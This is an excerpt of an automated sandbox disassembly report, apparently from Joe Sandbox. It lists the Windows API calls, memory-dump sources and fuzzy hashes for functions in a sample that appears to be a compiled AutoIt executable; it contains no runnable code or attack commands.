                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0039585A
                                                                          • GetMenuItemID.USER32(?,?), ref: 003958C9
                                                                          • GetSubMenu.USER32(?,?), ref: 003958D7
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00395928
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountMessagePostString
                                                                          • String ID:
                                                                          • API String ID: 650687236-0
                                                                          • Opcode ID: 0736627f830108cc92d9c0fa5b579a76d304c2fdd3342f7f1385b7c6052c4370
                                                                          • Instruction ID: 68ded3020d2aaef70157386c3500554cd473997694cab387b99dddbe38c94122
                                                                          • Opcode Fuzzy Hash: 0736627f830108cc92d9c0fa5b579a76d304c2fdd3342f7f1385b7c6052c4370
                                                                          • Instruction Fuzzy Hash: 71513C31E00615AFCF17EF64C855AAEBBB8EF48310F114465E816AB351CB75AE818B90
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0036EF06
                                                                          • VariantClear.OLEAUT32(00000013), ref: 0036EF78
                                                                          • VariantClear.OLEAUT32(00000000), ref: 0036EFD3
                                                                          • _memmove.LIBCMT ref: 0036EFFD
                                                                          • VariantClear.OLEAUT32(?), ref: 0036F04A
                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0036F078
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                          • String ID:
                                                                          • API String ID: 1101466143-0
                                                                          • Opcode ID: 4edf5218fadf4ba35479c232d9664aab48fea6d46bc5c3c30b81ec7331a92388
                                                                          • Instruction ID: 72be0a9217e6c10f6b6ef3dbe5f87790c47c066dd74e6e49b36e8f55e4f1acfd
                                                                          • Opcode Fuzzy Hash: 4edf5218fadf4ba35479c232d9664aab48fea6d46bc5c3c30b81ec7331a92388
                                                                          • Instruction Fuzzy Hash: EC5166B5A00209EFCB15CF58D880AAAB7B8FF4C314F15856AE959DB305E735E911CBA0
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00372258
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003722A3
                                                                          • IsMenu.USER32(00000000), ref: 003722C3
                                                                          • CreatePopupMenu.USER32 ref: 003722F7
                                                                          • GetMenuItemCount.USER32(000000FF), ref: 00372355
                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00372386
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                          • String ID:
                                                                          • API String ID: 3311875123-0
                                                                          • Opcode ID: 04b9ff8d2fa97333a3dbf2af273b6a748224320b1632d0896ab618232077c167
                                                                          • Instruction ID: dffafb638626de1ca9d242198a7625e5efe343321b507164c22ca39d9883f3b2
                                                                          • Opcode Fuzzy Hash: 04b9ff8d2fa97333a3dbf2af273b6a748224320b1632d0896ab618232077c167
                                                                          • Instruction Fuzzy Hash: 7751C134600249DFEF32CF64C888BAFBBF9BF05314F158229E8599B291D3798904CB51
                                                                          APIs
                                                                            • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0031179A
                                                                          • GetWindowRect.USER32(?,?), ref: 003117FE
                                                                          • ScreenToClient.USER32(?,?), ref: 0031181B
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0031182C
                                                                          • EndPaint.USER32(?,?), ref: 00311876
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                          • String ID:
                                                                          • API String ID: 1827037458-0
                                                                          • Opcode ID: 27d825bbfe0e434fba0e7a2c103aa53801f88c9d84366344e5994e29f11f5050
                                                                          • Instruction ID: 1ebe461b1adb10c4b1cf570dcd4f82ca5db4ba9bc1379854104b3a117180136f
                                                                          • Opcode Fuzzy Hash: 27d825bbfe0e434fba0e7a2c103aa53801f88c9d84366344e5994e29f11f5050
                                                                          • Instruction Fuzzy Hash: A541A0711057009FD712DF24DC84FEA7BECEB49724F144629F6A4CA2A1C7319885DB61
                                                                          APIs
                                                                          • ShowWindow.USER32(003D57B0,00000000,01146948,?,?,003D57B0,?,0039B5A8,?,?), ref: 0039B712
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 0039B736
                                                                          • ShowWindow.USER32(003D57B0,00000000,01146948,?,?,003D57B0,?,0039B5A8,?,?), ref: 0039B796
                                                                          • ShowWindow.USER32(00000000,00000004,?,0039B5A8,?,?), ref: 0039B7A8
                                                                          • EnableWindow.USER32(00000000,00000001), ref: 0039B7CC
                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0039B7EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 642888154-0
                                                                          • Opcode ID: f63c07b09f488f837a6dc471e236248e2e10309edf80907f71f690dd723a36a3
                                                                          • Instruction ID: 9f8d7b7d8d5feae54f53370cc49182a0f1c8f6bfd6c9c8d1e8218f0894addba7
                                                                          • Opcode Fuzzy Hash: f63c07b09f488f837a6dc471e236248e2e10309edf80907f71f690dd723a36a3
                                                                          • Instruction Fuzzy Hash: 5A419535600240AFDF23CFA4E599B95BBE1FF85350F1942B9F9488F6A2C731A856CB50
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00384E41,?,?,00000000,00000001), ref: 003870AC
                                                                            • Part of subcall function 003839A0: GetWindowRect.USER32(?,?), ref: 003839B3
                                                                          • GetDesktopWindow.USER32 ref: 003870D6
                                                                          • GetWindowRect.USER32(00000000), ref: 003870DD
                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0038710F
                                                                            • Part of subcall function 00375244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003752BC
                                                                          • GetCursorPos.USER32(?), ref: 0038713B
                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00387199
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                          • String ID:
                                                                          • API String ID: 4137160315-0
                                                                          • Opcode ID: 14042de2804bc451f325b91cd73b0772aa0712c08962180849fa6b9e4d4e75bc
                                                                          • Instruction ID: 6119fbb3842343eca6aea27434a12ab1085a889f7a298921312812e4556f0dec
                                                                          • Opcode Fuzzy Hash: 14042de2804bc451f325b91cd73b0772aa0712c08962180849fa6b9e4d4e75bc
                                                                          • Instruction Fuzzy Hash: C631F232509305AFC721EF14C849B9BB7AAFF88304F10091AF488D7191C775EA08CB92
                                                                          APIs
                                                                            • Part of subcall function 003680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003680C0
                                                                            • Part of subcall function 003680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003680CA
                                                                            • Part of subcall function 003680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003680D9
                                                                            • Part of subcall function 003680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003680E0
                                                                            • Part of subcall function 003680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003680F6
                                                                          • GetLengthSid.ADVAPI32(?,00000000,0036842F), ref: 003688CA
                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003688D6
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 003688DD
                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 003688F6
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,0036842F), ref: 0036890A
                                                                          • HeapFree.KERNEL32(00000000), ref: 00368911
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                          • String ID:
                                                                          • API String ID: 3008561057-0
                                                                          • Opcode ID: f1c6610c07b7d57110ed181e09e21394d78a32b30e4cc0868d8b352e8e9f273c
                                                                          • Instruction ID: d27da9394660f9f837c48762fe64e01754b57ea9aa290fac962af07232344ea6
                                                                          • Opcode Fuzzy Hash: f1c6610c07b7d57110ed181e09e21394d78a32b30e4cc0868d8b352e8e9f273c
                                                                          • Instruction Fuzzy Hash: 6811B171501209FFDB129FA4DC09BBE7BACEB49311F10822DE885D7214CB329D14DB60
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003685E2
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 003685E9
                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003685F8
                                                                          • CloseHandle.KERNEL32(00000004), ref: 00368603
                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00368632
                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00368646
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                          • String ID:
                                                                          • API String ID: 1413079979-0
                                                                          • Opcode ID: 414b1b079e57caa2746fcfd0f37df466d3f068ade6c2bc2a64a447bd889d8488
                                                                          • Instruction ID: 47cd21be0d5c4429638ae6a59c704f397a2b1252aa9cb67feb655dd20b31285b
                                                                          • Opcode Fuzzy Hash: 414b1b079e57caa2746fcfd0f37df466d3f068ade6c2bc2a64a447bd889d8488
                                                                          • Instruction Fuzzy Hash: E9115972500209AFDF028FA4DD49BEE7BADEF09348F058165FE05E2160C7728D64EB60
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0036B7B5
                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0036B7C6
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0036B7CD
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0036B7D5
                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0036B7EC
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0036B7FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: 2591349432d989c3bcee2f064709927ca7952321fb368fa1f2a47fc5038c89db
                                                                          • Instruction ID: 1187aa1ba7ff985934f76efa1b436428147d968f2797ca6f9e67e34fd3d44e22
                                                                          • Opcode Fuzzy Hash: 2591349432d989c3bcee2f064709927ca7952321fb368fa1f2a47fc5038c89db
                                                                          • Instruction Fuzzy Hash: 68017175A00309BFEB119BA69C45A5ABFACEF48311F008066FA04E7291D6719C10CFA0
                                                                          APIs
                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00330193
                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0033019B
                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003301A6
                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003301B1
                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 003301B9
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 003301C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: 5a2ac757328d691b107112fff851293e42734b45879e204521816a8432f143fe
                                                                          • Instruction ID: 2f19bb5bc7dd4dcfa8ae7d8213bf9f38d70487341b03391ff9a970292042abfa
                                                                          • Opcode Fuzzy Hash: 5a2ac757328d691b107112fff851293e42734b45879e204521816a8432f143fe
                                                                          • Instruction Fuzzy Hash: 28016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A864CBE5
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003753F9
                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0037540F
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0037541E
                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0037542D
                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00375437
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0037543E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 839392675-0
                                                                          • Opcode ID: c42452143445cf67b1bec683f7f0ff85b1bce89ad13ba57f6e1fa5ad040c1c12
                                                                          • Instruction ID: 68f703dc3839a2766e29897fed240111ac2618f7ca0b3e1acb206ed6b670b55d
                                                                          • Opcode Fuzzy Hash: c42452143445cf67b1bec683f7f0ff85b1bce89ad13ba57f6e1fa5ad040c1c12
                                                                          • Instruction Fuzzy Hash: 16F03032641658BFE7225BA2DC0EEEF7B7CEFC6B11F00016AFA04D1051D7A61A01C6B5
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00377243
                                                                          • EnterCriticalSection.KERNEL32(?,?,00320EE4,?,?), ref: 00377254
                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00320EE4,?,?), ref: 00377261
                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00320EE4,?,?), ref: 0037726E
                                                                            • Part of subcall function 00376C35: CloseHandle.KERNEL32(00000000,?,0037727B,?,00320EE4,?,?), ref: 00376C3F
                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00377281
                                                                          • LeaveCriticalSection.KERNEL32(?,?,00320EE4,?,?), ref: 00377288
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                          • String ID:
                                                                          • API String ID: 3495660284-0
                                                                          • Opcode ID: ed9ba2ed32c13ae2195af446832a1ded1cec43acc858b625bb8d25a859c8ade5
                                                                          • Instruction ID: f43d5f69e1bdc865474724164be97dc28dd70487657adfcecbf1a3fc0fd62501
                                                                          • Opcode Fuzzy Hash: ed9ba2ed32c13ae2195af446832a1ded1cec43acc858b625bb8d25a859c8ade5
                                                                          • Instruction Fuzzy Hash: B9F03A3A540612AFD7232B68ED8CADA773DEF49702F110933F642D50A1CB7B6811CA50
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0036899D
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 003689A9
                                                                          • CloseHandle.KERNEL32(?), ref: 003689B2
                                                                          • CloseHandle.KERNEL32(?), ref: 003689BA
                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 003689C3
                                                                          • HeapFree.KERNEL32(00000000), ref: 003689CA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                          • String ID:
                                                                          • API String ID: 146765662-0
                                                                          • Opcode ID: 77917635242664e9a6d9330ed8854d9e5e00bd3ccaa64f27649a822f79171d88
                                                                          • Instruction ID: 10358fb73cfb8d6df6fa0015251bc776d1e68368b3b3cde2944b3824e769516d
                                                                          • Opcode Fuzzy Hash: 77917635242664e9a6d9330ed8854d9e5e00bd3ccaa64f27649a822f79171d88
                                                                          • Instruction Fuzzy Hash: BEE04E76104505EFDB022BE5EC0895ABB69EB89762B608622F219C1470CB3794619B90
                                                                          APIs
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003A2C7C,?), ref: 003676EA
                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003A2C7C,?), ref: 00367702
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,0039FB80,000000FF,?,00000000,00000800,00000000,?,003A2C7C,?), ref: 00367727
                                                                          • _memcmp.LIBCMT ref: 00367748
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                          • String ID: ,,:
                                                                          • API String ID: 314563124-824956042
                                                                          • Opcode ID: 613bed70420322c3902813980e1300d665961e9ac2c19cf9a6a17121350f7428
                                                                          • Instruction ID: 1d2f0f2d50768584b24c72d1eaba1e6edd0b8e541ff37b938e0e5cce222ee978
                                                                          • Opcode Fuzzy Hash: 613bed70420322c3902813980e1300d665961e9ac2c19cf9a6a17121350f7428
                                                                          • Instruction Fuzzy Hash: 30812D75A00109EFCB05DFA4C984DEEB7B9FF89315F208158E506EB254DB71AE46CB60
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00388613
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00388722
                                                                          • VariantClear.OLEAUT32(?), ref: 0038889A
                                                                            • Part of subcall function 00377562: VariantInit.OLEAUT32(00000000), ref: 003775A2
                                                                            • Part of subcall function 00377562: VariantCopy.OLEAUT32(00000000,?), ref: 003775AB
                                                                            • Part of subcall function 00377562: VariantClear.OLEAUT32(00000000), ref: 003775B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                          • API String ID: 4237274167-1221869570
                                                                          • Opcode ID: fb1ccd5d9a40607b5fb0afc8a2efe207193e1a809296b10ec6cb82cdd8b3b5a3
                                                                          • Instruction ID: 7c5995e625a02790e476f2cf9bcbd0ae8724f3eb9c14cc804048f13ae47d8431
                                                                          • Opcode Fuzzy Hash: fb1ccd5d9a40607b5fb0afc8a2efe207193e1a809296b10ec6cb82cdd8b3b5a3
